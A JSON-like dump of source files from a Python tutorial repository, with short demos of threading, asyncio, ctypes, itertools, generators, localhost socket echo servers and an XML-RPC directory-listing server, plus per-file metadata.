"text": "# producer-consumer question\n\nimport time\nimport logging\nfrom concurrent.futures import ThreadPoolExecutor\nfrom threading import Event\nfrom queue import Queue\nimport random\n\n\ndef producer(q, event):\n \"\"\"fill the queue 'q' until event is set\"\"\"\n while not event.is_set():\n message = random.randint(1, 101) # [1, 100]\n logging.info(f\"produce: {message}\")\n q.put(message)\n logging.info(\"producer quit!\")\n\n\ndef consumer(q, event):\n \"\"\"empty the queue unitl event is set or queue is empty\"\"\"\n while not event.is_set() or not q.empty():\n message = q.get() # block but not raise exception\n logging.info(f\"consumer taken {message}\")\n logging.info(\"consumer quit!\")\n\n\nif __name__ == \"__main__\":\n event = Event()\n que = Queue(maxsize=10)\n\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO,\n datefmt=\"%H:%M:%S\")\n\n with ThreadPoolExecutor(max_workers=2) as executor:\n executor.submit(producer, que, event)\n executor.submit(consumer, que, event)\n time.sleep(0.1)\n logging.info(\"main thread set the event\")\n event.set()\n"
},
{
"alpha_fraction": 0.5661478638648987,
"alphanum_fraction": 0.570038914680481,
"avg_line_length": 22.363636016845703,
"blob_id": "5c452f9696cc23be677b951b93daffc6c734c868",
"content_id": "a120002e2218eef911f1822aa03281524195e272",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 514,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 22,
"path": "/concurrency/threading_demo3.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import logging\nimport time\nimport threading\n\ndef job(name):\n logging.info(f\"thread {name} starting\")\n time.sleep(1)\n logging.info(f\"thread {name} finished\")\n\nif __name__ == \"__main__\":\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO,\n datefmt=\"%H:%M:%S\")\n\n threads = []\n for i in range(5):\n t = threading.Thread(target=job, args=(i,))\n threads.append(t)\n t.start()\n\n for t in threads:\n t.join()\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.7509999871253967,
"avg_line_length": 30.21875,
"blob_id": "b133fd93eac7d0482b8db2c1b4d03cf9b797ff3c",
"content_id": "763761fbf2ee1d97c241f56d6e7271577d669f97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1000,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 32,
"path": "/ffi/ctypes_demo/example1/test.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import ctypes\n\nlibc = ctypes.CDLL(\"./libclib.so\")\n\n# python string is immutable\noriginal_string = \"starting string\"\n# ctypes string_buffer (bytes array) is mutable\nmutable_string = ctypes.create_string_buffer(str.encode(original_string))\n\nprint(\"Before: original:\", original_string)\nlibc.add_one_to_string(original_string)\nprint(\"After: original:\", original_string)\n\nprint(\"Before: mutable: \", mutable_string.value)\nlibc.add_one_to_string(mutable_string) # Works!\nprint(\"After: mutable: \", mutable_string.value)\n\n\nalloc_func = libc.alloc_C_string\nfree_func = libc.free_C_string\nalloc_func.restype = ctypes.POINTER(ctypes.c_char)\nfree_func.argtypes = [ctypes.POINTER(ctypes.c_char), ]\n\nprint(\"Allocating and freeing memory in C\")\nc_string_address = alloc_func()\n\n# We should convert POINTER object to something we can use on the Python side\nphrase = ctypes.c_char_p.from_buffer(c_string_address)\nprint(\"Bytes in Python {0}\".format(phrase.value))\n\n# let C free the memory\nfree_func(c_string_address)\n\n"
},
{
"alpha_fraction": 0.6783625483512878,
"alphanum_fraction": 0.7105262875556946,
"avg_line_length": 33,
"blob_id": "7d87b5457a5b056c7d0bf552d16b8c139e628af6",
"content_id": "3ac6e250af24426a94a7455ca9c267fb7a95a9b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 342,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 10,
"path": "/itertools_demo/iter_demo_partition_iterable.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# partition an iterable into another iterable of chunks of size n\n# ref https://realpython.com/python-itertools/#what-is-itertools-and-why-should-you-use-it\n\ndef better_grouper(inputs, n):\n # same references in the following\n iters = [iter(inputs)] * n \n return zip(*iters)\n\nfor _ in better_grouper(range(100000000), 10):\n pass\n\n\n"
},
{
"alpha_fraction": 0.6077419519424438,
"alphanum_fraction": 0.6245161294937134,
"avg_line_length": 21.114286422729492,
"blob_id": "2c9a5e9dd3ea32fd075a36e85e06fd920b3e17ae",
"content_id": "2c17a64990ef7c6477159c2d22994aa7ef09dfc2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 775,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 35,
"path": "/generators_demo/generator_function_demo.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# a generator of palindrome numbers\n# ref: https://realpython.com/introduction-to-python-generators/\n\n# list comprehensions can be faster to evaluate than the equivalent generator expression. \n\n# StopIteration exception\n\n#Generator functions use the Python yield keyword instead of return\ndef infinite_sequence():\n num = 0\n while True:\n yield num\n num += 1\n\n\ndef is_palindrome(num):\n if num // 10 == 0:\n return True\n temp = num\n reversed_num = 0\n\n while temp != 0:\n reversed_num = (reversed_num * 10) + (temp % 10)\n temp = temp // 10\n\n if num == reversed_num:\n return num\n else:\n return False\n\nif __name__ == \"__main__\":\n\tfor i in infinite_sequence():\n\t\tpal = is_palindrome(i)\n\t\tif pal:\n\t\t\tprint(pal)\n\n"
},
{
"alpha_fraction": 0.6222570538520813,
"alphanum_fraction": 0.6426331996917725,
"avg_line_length": 20.266666412353516,
"blob_id": "498ff16bf5fb76899d0f9b6f2035175bf8d9e7bf",
"content_id": "9c91213e4b1e4102ed7bd1ecf0720aca19d59bdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 638,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 30,
"path": "/concurrency/async/async_demo2.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# chaining of coroutine\n\n# two phases that must be executed in order,\n# but that can run concurrently with other operation\n\nimport asyncio\n\n\nasync def outer():\n result1 = await phase1()\n result2 = await phase2(result1)\n return (result1, result2)\n\n\nasync def phase1():\n print('in phase1')\n return 'result1'\n\n\nasync def phase2(arg):\n print('in phase2')\n return 'result2 derived from {}'.format(arg)\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n try:\n return_value = loop.run_until_complete(outer())\n print('return value: {!r}'.format(return_value))\n finally:\n loop.close()\n"
},
{
"alpha_fraction": 0.5709571242332458,
"alphanum_fraction": 0.5775577425956726,
"avg_line_length": 28.25806427001953,
"blob_id": "fb344b7a9ffbf6d74a249de04932c96d647442eb",
"content_id": "2101ec7c23a0f5482c1647fb0ee0a452bc7875f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 909,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 31,
"path": "/concurrency/threading_demo6.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import logging\nimport time\nfrom concurrent.futures import ThreadPoolExecutor\nfrom threading import Lock\n\nclass FakeDatabase:\n def __init__(self):\n self.value = 0\n self._lock = Lock()\n\n def update(self, name):\n with self._lock: # call .acquire and .release automatically\n local_copy = self.value # retrieve db\n local_copy += 1 # work....\n time.sleep(0.1)\n self.value = local_copy # save to db\n\n\nif __name__ == \"__main__\":\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO,\n datefmt=\"%H:%M:%S\")\n\n db = FakeDatabase()\n\n # context manager will call .join()\n with ThreadPoolExecutor(max_workers=3) as executor:\n for i in range(3):\n # .submit(function, *args, **kwargs)\n executor.submit(db.update, i)\n print(db.value)\n\n\n"
},
{
"alpha_fraction": 0.6491862535476685,
"alphanum_fraction": 0.6763110160827637,
"avg_line_length": 19.407407760620117,
"blob_id": "7038eb5582e1153bb545ca28d325140fd4824402",
"content_id": "0e7bd71d4d654bcd0c5bb5acb339fef1086384ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 553,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 27,
"path": "/collections_demo/demo_deque_threadsafe.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# deqeue is threadsafe\n\nfrom collections import deque\nfrom threading import Thread\nimport time \nimport random\n\ncandle = deque(range(100))\n\ndef consumer(direction, func):\n\twhile True:\n\t\ttry:\n\t\t\tval = func() # pop(), or popleft()\n\t\t\ttime.sleep(0.01*random.randint(1,10))\n\t\texcept IndexError:\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"{}: {}\".format(direction, val))\n\tprint(\"{}: Done!\".format(direction))\n\nt1 = Thread(target=consumer, args=(\"left\", candle.popleft) )\nt2 = Thread(target=consumer, args=(\"right\", candle.pop) )\n\nt1.start()\nt2.start()\nt1.join()\nt2.join()\n\n\n"
},
{
"alpha_fraction": 0.6882352828979492,
"alphanum_fraction": 0.6882352828979492,
"avg_line_length": 17.88888931274414,
"blob_id": "327df3283263bfef400757c037995f49901ce1c4",
"content_id": "28e40751dd36b56bdc1e861675862a94fe3e1fda",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 170,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 9,
"path": "/ffi/ctypes_demo/example2/point.h",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "typedef struct {\n int x;\n int y;\n} Point;\n\nvoid show_point(Point point);\nvoid move_point(Point point);\nvoid move_point_by_ref(Point *point);\nPoint get_point(void);\n"
},
{
"alpha_fraction": 0.6296296119689941,
"alphanum_fraction": 0.6378600597381592,
"avg_line_length": 20.130434036254883,
"blob_id": "f96341a05a2fb0208491c409b1054ed7fa535f83",
"content_id": "ba2843a53c54fa67a978a5d6cd9ba8eb5ea24cfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 486,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 23,
"path": "/sockets/uds/client.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import socket\nimport sys\n\nsock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\naddr = \"./uds_socket\"\ntry:\n sock.connect(addr)\nexcept socket.error as msg:\n print(msg)\n sys.exit(1)\n\nmessage = b'This is the message. It will be echoed from the server.'\n\ntry:\n sock.sendall(message)\n counts = 0\n amount = len(message)\n while counts < amount:\n chunk = sock.recv(16)\n counts += len(chunk)\n print(\"Got {}\".format(chunk))\nfinally:\n sock.close()\n"
},
{
"alpha_fraction": 0.6552631855010986,
"alphanum_fraction": 0.678947389125824,
"avg_line_length": 28.230770111083984,
"blob_id": "e5a17e058e6bcfe5ea0147558e3d322ed3f22ce6",
"content_id": "fc4d4f74d5ed652699b75b0fc09a129cd036b496",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 380,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 13,
"path": "/sockets/udp/client.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import socket\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nserver_addr = ('localhost', 10000)\nmessage = b'This is the message. It will be repeated.'\n\ntry:\n sent = sock.sendto(message, server_addr)\n print(\"sent {} bytes to {}\".format(sent, server_addr))\n data, server = sock.recvfrom(4096)\n print(\"received back {}\".format(data))\nfinally:\n sock.close()\n"
},
{
"alpha_fraction": 0.7868020534515381,
"alphanum_fraction": 0.7868020534515381,
"avg_line_length": 14.076923370361328,
"blob_id": "c397711d5436550113751d20f82f759a5fb7a318",
"content_id": "7ab54c62d0a2509843bd376b3d74a448120fa2ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 13,
"path": "/README.md",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# python-tricks\n\nshort code examples saving some python tricks for quick reference \n\n## Contents covered:\n\n context-manager\n\n generator expressions/functions\n \n itertools functions\n \n collections\n\n"
},
{
"alpha_fraction": 0.5245283246040344,
"alphanum_fraction": 0.5415094494819641,
"avg_line_length": 24.190475463867188,
"blob_id": "6c5115c77f76760e9a252d211500689bc1736360",
"content_id": "36c6f845d807903c20e6be0cab751b4ebf497526",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 21,
"path": "/sockets/tcp/server.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import socket\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\naddr = ('localhost', 10000)\nsock.bind(addr)\nsock.listen(1) # only 1 connection\n\nwhile True:\n conn, client_addr = sock.accept()\n print(\"client address: {}\".format(client_addr))\n try:\n while True:\n chunk = conn.recv(16)\n print('Received: {}'.format(chunk))\n if chunk:\n conn.sendall(chunk)\n else:\n print(\"Done!\")\n break\n finally:\n conn.close()\n\n"
},
{
"alpha_fraction": 0.6151515245437622,
"alphanum_fraction": 0.6196969747543335,
"avg_line_length": 22.464284896850586,
"blob_id": "3bb484f08ccc5a1df9863ce5822ed6fab347a846",
"content_id": "93a1cd28ec892f9dae71e93b886a7c1e83bef6f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 660,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 28,
"path": "/context_manager_demo.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# context_manager.demo\n# ref. https://dbader.org/blog/python-context-managers-and-with-statement\n \nclass Indent(object):\n\tdef __init__(self):\n\t\tself.level = 0\n\n\tdef __enter__(self):\n\t\tself.level += 1\n\t\treturn self\n\n\tdef __exit__(self,exc_type, exc_val, exc_tb):\n\t\tself.level -= 1\n\n\tdef print(self, text):\n\t\tprint(\" \" * self.level + text)\n\n\nif __name__ == \"__main__\":\n\tprint(\"Entering indent context manager:\")\n\twith Indent() as indentor: \n # with Indent() called __init__() then __enter__()\n\t\tindentor.print(\"HI\")\n\t\twith indentor: # calls __enter__()\n\t\t\tindentor.print(\"John\")\n\t\t\twith indentor:\n\t\t\t\tindentor.print(\"Doe\")\n\t\tindentor.print(\"Bye!\")\n\n\n\n"
},
{
"alpha_fraction": 0.6662198305130005,
"alphanum_fraction": 0.6715817451477051,
"avg_line_length": 34.52381134033203,
"blob_id": "b7e5e232fd19e3d5604902d1b9680eefb1c11b48",
"content_id": "5adda6e4f963eafedc97079bfc8ab3ab47a73b8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 746,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 21,
"path": "/generators_demo/generator_expression_demo.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# generator_expession.py\n# build data pipeline using generator expressions\n# ref https://realpython.com/introduction-to-python-generators/\n\nfile_name = \"techcrunch.csv\"\nlines = (line for line in open(file_name))\nlist_line = (s.rstrip().split(\",\") for s in lines)\ncols = next(list_line)\ndict_line = (dict(zip(cols, data)) for data in list_line)\nfunding = ( int(d[\"raisedAmt\"]) for d in dict_line \n\t\t\t\t\t\t\t\tif d[\"round\"] == \"a\" )\n#total_series_a = sum(funding)\ntotal_series_a = 0\ncount_series_a = 0\nfor f in funding:\n\ttotal_series_a += f\n\tcount_series_a += 1\navg = total_series_a/count_series_a\nprint( f\"Num of Series A fundrasing {count_series_a}, \"\n\t f\"Total fundraising: ${total_series_a}, \"\n f\"Average fundraising ${avg:.2f}\" )\n"
},
{
"alpha_fraction": 0.7451523542404175,
"alphanum_fraction": 0.7534626126289368,
"avg_line_length": 31.81818199157715,
"blob_id": "2da4e643693907c7c7b50fc9eebdc89674bfd86a",
"content_id": "b6d46312c276ad59672371d2f090245979d8eae4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 361,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 11,
"path": "/collections_demo/demo_namedtuple.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "from collections import namedtuple\n\n# subclass tuple\n# Namedtuples are also a memory-efficient option when defining an immutable \n# +class in Python.\n\nfruit = namedtuple('fruit', ['name', 'color', 'price'])\nwatermelon = fruit('watermelon', 'green', 1.00)\nprint(watermelon)\nprint(watermelon.color, watermelon.name, watermelon.price)\nprint(watermelon._asdict())\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.6494565010070801,
"avg_line_length": 29.66666603088379,
"blob_id": "6b3067abdab7aab73195065e7fc05f408f58aa8c",
"content_id": "668f9284243929af4b235dbf5e76c2a822c97896",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 368,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 12,
"path": "/sockets/udp/server.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import socket\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\naddr = ('localhost', 10000)\nsock.bind(addr)\n\nwhile True:\n data, client_addr = sock.recvfrom(4096)\n if data:\n print(\"received {} bytes from {}\".format(len(data), client_addr))\n size = sock.sendto(data, client_addr)\n print(\"sent {} bytes to {}\".format(size, client_addr))\n"
},
{
"alpha_fraction": 0.708791196346283,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 25,
"blob_id": "723658043dc8718ea939b12f5fa5b0cc043cbf80",
"content_id": "350f0113697ec0415da02fe500d553f14f1bc9be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 728,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 28,
"path": "/xmlrpc/example1/server.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# simple xmlrpc server. serving content of a directory\nfrom xmlrpc.server import SimpleXMLRPCServer\nimport logging\nimport os\n\nlogging.basicConfig(level=logging.INFO)\n\nserver = SimpleXMLRPCServer(\n ('localhost', 5678),\n logRequests=True,\n)\n\ndef listdir(dir_name): # dir_name absolute/relative path\n logging.info(\"list content of dir: {}\".format(dir_name))\n try:\n return os.listdir(dir_name)\n except OSError:\n return \"no such file or directory!\"\n\n# the client must access via \"dir()\" instead of \"listdir()\"\n# server.register_function(listdir, 'dir')\n# namespace is allowed\nserver.register_function(listdir, 'dir.list')\n\ntry:\n server.serve_forever()\nexcept KeyboardInterrupt:\n print(\"exit...\")\n"
},
{
"alpha_fraction": 0.7644110321998596,
"alphanum_fraction": 0.7644110321998596,
"avg_line_length": 25.53333282470703,
"blob_id": "a4222b44a127ab0d404bbe2e7fc710e4a1d94479",
"content_id": "f1536332acabca488a0e7af553c29032ecd36c05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 399,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 15,
"path": "/ffi/README.md",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "https://dbader.org/blog/python-cffi\nhttps://dbader.org/blog/python-ctypes-tutorial\n\nctypes:\n\tpython string immutable,\n\tctypes.string_buffer is mutable, -- char*\n\n\tfunction signature\n\n\tcfun = clib.func\n\tcfun.restype = ctypes.POINTER(ctypes.c_char)\n\tcfun.argtypes = [ctypes.POINTER(ctypes.c_char), ]\n\n\tcross-language marshalling\n\t the language that allocates the memory also needs to free the memory\n\n"
},
{
"alpha_fraction": 0.5116279125213623,
"alphanum_fraction": 0.5511627793312073,
"avg_line_length": 24.294116973876953,
"blob_id": "61a258fe769b64b7eaf8eae920ef062c16bf4c7b",
"content_id": "a2526d9efe7a5a24a66052677f7b0c6f1e52d78a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 17,
"path": "/itertools_demo/iter_demo_tea_slice_chain.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import itertools as it\n\ndef cut(deck, n):\n \"\"\"Return an iterator over a deck of cards cut at index `n`.\"\"\"\n deck1, deck2 = it.tee(deck, 2)\n top = it.islice(deck1, n)\n bottom = it.islice(deck2, n, None)\n return it.chain(bottom, top)\n\nranks = ['A', 'K', 'Q', 'J', '10', '9', '8', '7', '6', '5', '4', '3', '2']\nsuits = ['H', 'D', 'C', 'S']\n\ncards = it.product(ranks, suits)\n\ncards = cut(cards, 26)\n\nprint(list(cards))\n"
},
{
"alpha_fraction": 0.66847825050354,
"alphanum_fraction": 0.66847825050354,
"avg_line_length": 15.727272987365723,
"blob_id": "79eeaca0bdb85ae167a33236ece754dfa6bac9c2",
"content_id": "b4b4e666a591dc1194baccdcfa2bb3fa815d6fb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 11,
"path": "/ffi/ctypes_demo/example2/line.h",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "#include \"point.h\"\n\n/* nested structure */\ntypedef struct {\n Point start;\n Point end;\n} Line;\n\nLine get_line(void);\nvoid show_line(Line line);\nvoid move_line_by_ref(Line *line);\n"
},
{
"alpha_fraction": 0.679425835609436,
"alphanum_fraction": 0.6985645890235901,
"avg_line_length": 25.125,
"blob_id": "325979682d35827877fd2a7443adf14ae679f530",
"content_id": "067ecf04a2181d1a8d9e7da12364375316dbc338",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 209,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 8,
"path": "/xmlrpc/example1/client.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import xmlrpc.client\n\nproxy = xmlrpc.client.ServerProxy(\"http://localhost:5678\")\nprint(proxy.dir.list(\"/tmp\"))\ntry:\n proxy.listdir(\"/tmp\")\nexcept xmlrpc.client.Fault as err:\n print(\"Err {}\".format(err))\n"
}
] | 41 |
nohjune/ct_201710920 | https://github.com/nohjune/ct_201710920 | 641784ba736439b1591693534c26aa4577a1f5fb | 3c12dd41cb017a4a9c24e2af807c134d70e45c46 | 465cf738296082d681a11e2d9a15bf54d9af710e | refs/heads/master | 2021-01-19T09:37:45.449311 | 2017-05-29T08:06:13 | 2017-05-29T08:06:13 | 87,774,527 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.38768717646598816,
"alphanum_fraction": 0.6006655693054199,
"avg_line_length": 11.399999618530273,
"blob_id": "e1ce62da7cd280e402529a282cb74e321ed68597",
"content_id": "6d6af98d25620b3340e24e863c5d6d466687f0c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 603,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 45,
"path": "/ct_2017/GanghoRoomClean.py",
"repo_name": "nohjune/ct_201710920",
"src_encoding": "UTF-8",
"text": "import turtle\r\nwn = turtle.Screen()\r\nt1 = turtle.Turtle()\r\nwn.bgpic(\"C:\\\\Users\\\\400T6B\\\\Downloads\\\\GanghoRoomFloorPlan.gif\")\r\nt1.fd(300)\r\nt1.home()\r\nt1.rt(90)\r\nt1.fd(250)\r\nt1.lt(90)\r\nt1.fd(300)\r\nt1.lt(90)\r\nt1.fd(100)\r\nt1.lt(90)\r\nt1.fd(400)\r\nt1.rt(90)\r\nt1.fd(50)\r\nt1.lt(90)\r\nt1.fd(100)\r\nt1.fd(100)\r\nt1.lt(90)\r\nt1.fd(75)\r\nt1.lt(90)\r\nt1.fd(100)\r\nt1.lt(90)\r\nt1.fd(75)\r\nt1.rt(90)\r\nt1.penup()\r\nt1.fd(100)\r\nt1.pendown()\r\nt1.lt(90)\r\nt1.fd(400)\r\nt1.rt(90)\r\nt1.fd(50)\r\nt1.rt(90)\r\nt1.fd(125)\r\nt1.lt(90)\r\nt1.fd(300)\r\nt1.rt(90)\r\nt1.fd(50)\r\nt1.rt(90)\r\nt1.fd(100)\r\nt1.lt(90)\r\nt1.penup()\r\nt1.home()\r\nwn.exitonclick()"
},
{
"alpha_fraction": 0.4540778696537018,
"alphanum_fraction": 0.5584129095077515,
"avg_line_length": 18.938461303710938,
"blob_id": "7b75949a0cea7826a82e2133cf285a3d2f8ef2c6",
"content_id": "63355073c2ecb72794f4776e139e167cf003fbdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1363,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 65,
"path": "/ct_2017/201710920_10_5.py",
"repo_name": "nohjune/ct_201710920",
"src_encoding": "UTF-8",
"text": "import turtle\r\nwn=turtle.Screen()\r\nt1=turtle.Turtle()\r\nwidth=wn.window_width()\r\nx1=0.0 - (width-40)/3\r\nx2=0.0\r\nx3=0.0 + (width-40)/3\r\ndef drawTriangleAt(size,pos):\r\n t1.penup()\r\n t1.goto(pos,0)\r\n t1.setheading(0)\r\n t1.pendown()\r\n t1.write(t1.pos())\r\n t1.forward(100)\r\n t1.write(t1.pos())\r\n t1.left(120)\r\n t1.forward(100)\r\n t1.write(t1.pos())\r\n t1.left(120)\r\n t1.forward(100)\r\n t1.write(t1.pos())\r\n t1.left(120)\r\ndrawTriangleAt(100,x1)\r\ndef drawPentagon(size,pos):\r\n t1.penup()\r\n t1.goto(pos,0)\r\n t1.setheading(0)\r\n t1.pendown()\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.left(72)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.left(72)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.left(72)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.left(72)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\ndrawPentagon(100,x2)\r\ndef drawStarAt(size,pos):\r\n t1.penup()\r\n t1.goto(pos,0)\r\n t1.setheading(0)\r\n t1.pendown()\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.rt(144)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.rt(144)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.rt(144)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.rt(144)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.rt(144)\r\n t1.write(t1.pos())\r\ndrawStarAt(100,x3)\r\n"
},
{
"alpha_fraction": 0.5430266857147217,
"alphanum_fraction": 0.6053412556648254,
"avg_line_length": 15.8421049118042,
"blob_id": "ba1951c2fded1945f8d0974d3f41d96d7dd6f0cd",
"content_id": "01f87e8f608712b51b530b236fe5982075c273fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 339,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 19,
"path": "/ct_2017/baramgaebi2.py",
"repo_name": "nohjune/ct_201710920",
"src_encoding": "UTF-8",
"text": "import turtle \r\nwn=turtle.Screen() \r\nt1=turtle.Turtle()\r\nturnby=45\r\nsize=100\r\noldpos=t1.pos()\r\noldhead=t1.heading()\r\nnum=1\r\ndef wind(size):\r\n t1.fd(size)\r\n t1.rt(90)\r\n t1.fd(size)\r\n t1.penup()\r\n t1.setpos(oldpos)\r\n t1.setheading(oldhead+turnby*num)\r\n t1.pendown()\r\nfor num in range(1,9):\r\n wind(size)\r\n num+=1"
},
{
"alpha_fraction": 0.45517241954803467,
"alphanum_fraction": 0.5431034564971924,
"avg_line_length": 17.399999618530273,
"blob_id": "80d8278abcde8eb2156d07640169a89d57c9fa8b",
"content_id": "adc4c5da7ebff112c5bc69ad03773eb65ec4cdfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 582,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 30,
"path": "/ct_2017/drawSquare_Triangle_Star.py",
"repo_name": "nohjune/ct_201710920",
"src_encoding": "UTF-8",
"text": "import turtle\r\nwn=turtle.Screen()\r\nt1=turtle.Turtle()\r\ndef drawSquareAt(x,y,size):\r\n t1.penup()\r\n t1.goto(x,y)\r\n t1.pendown()\r\n for a in range(0,4):\r\n t1.fd(size)\r\n t1.rt(90)\r\n\r\ndef drawTriangleAt(x,y,size):\r\n t1.penup()\r\n t1.goto(x,y)\r\n t1.pendown()\r\n for a in range(0,3):\r\n t1.fd(size)\r\n t1.lt(120)\r\n\r\ndef drawStarAt(x,y,size):\r\n t1.penup()\r\n t1.goto(x,y)\r\n t1.pendown()\r\n for a in range(0,5):\r\n t1.fd(size)\r\n t1.rt(144)\r\n\r\ndrawSquareAt(-470,0,100)\r\ndrawTriangleAt(-100,0,100)\r\ndrawStarAt(370,0,100)"
},
{
"alpha_fraction": 0.6400911211967468,
"alphanum_fraction": 0.698177695274353,
"avg_line_length": 15.215685844421387,
"blob_id": "e9c4ecfa821fb2381cb5d2788bdc29b31ca0d8d6",
"content_id": "eac03ceaf9ff1a6e46ade1fdae164a4b39d0f00c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 878,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 51,
"path": "/ct_2017/baramgebi.py",
"repo_name": "nohjune/ct_201710920",
"src_encoding": "UTF-8",
